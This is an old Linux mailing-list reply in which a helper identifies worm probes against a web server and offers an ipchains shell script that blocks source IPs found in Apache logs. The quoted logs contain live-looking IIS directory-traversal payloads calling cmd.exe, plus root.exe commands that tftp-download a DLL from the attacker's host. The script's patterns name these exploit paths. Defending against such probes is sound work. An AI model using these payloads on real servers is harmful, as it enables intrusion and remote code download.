Re: [newbie] Can't block dos attack

Sun, 28 Jul 2002 18:04:52 -0700 

Try the script below, which should take care of the problem.  Of course,
this isn't a dos attack, it's a virus attack (one of the viruses going
around attempting to infect an iis server).

Which kernel are you using?  If it's 2.4.x, iptables is the way to block
things out.  (in that case let me know, and I'll adapt this to deal with
iptables).

Michael

-- Begin Script --

#!/bin/sh
#
# Block sites which originate Nimba queries from Apache server
# Apache must be configured with HostnameLookups Off
# Adapted from an earlier script found on one of the Mandrake lists
# Changes by Michael Viron
# Last Update: 2/20/2002
LOGS=/var/log/httpd
# Change IP to reflect yours.
DESTINATION = 192.168.1.1

cd $LOGS

grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/system32\/cmd\.exe/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done
# Block sites which originate Nimbda queries from Apache server
# Apache must be configured with HostnameLookups Off

#LOGS=/var/log/httpd
#cd $LOGS
grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/scripts\/Admin\.dll/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done

grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/MSACD\/Admin\.dll/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done

grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/scripts\/root\.exe/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done
grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/default\.ida/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
if ! fgrep $host /var/tmp/blocked >/dev/null
then
echo $host >>/var/tmp/blocked
/sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>
/etc/ipchains.add
fi
done
cat /etc/ipchains.add >> /etc/sysconfig/ipchains
/etc/rc.d/init.d/ipchains restart
rm -f /etc/ipchains.add

-- End Script --



At 05:29 PM 7/28/2002 -0700, you wrote:
>I am getting strange hits to my web server,
>I don't like it and I wish to know how
>to stop them from slipping past my defenses.
>
>I try using ipchains, most addresses are
>blocked, but for reasons I can't figure out,
>this address 65.192.23.150 keeps showing up.
>
>I don't understand it, if ipchains,
>/etc/hosts.deny can't block it, what can?
>
>Do I send back a command to shut down
>their server?
>
>How do I get the point accross?
>
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir
>HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET
>/scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.
dll
>HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll
>HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET
>/MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-"
>"-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir
>HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 325 "-" "-"
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Health - Feel better, live better
>http://health.yahoo.com
>
>Want to buy your Pack or Services from MandrakeSoft? 
>Go to http://www.mandrakestore.com
>


Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com

Reply via email to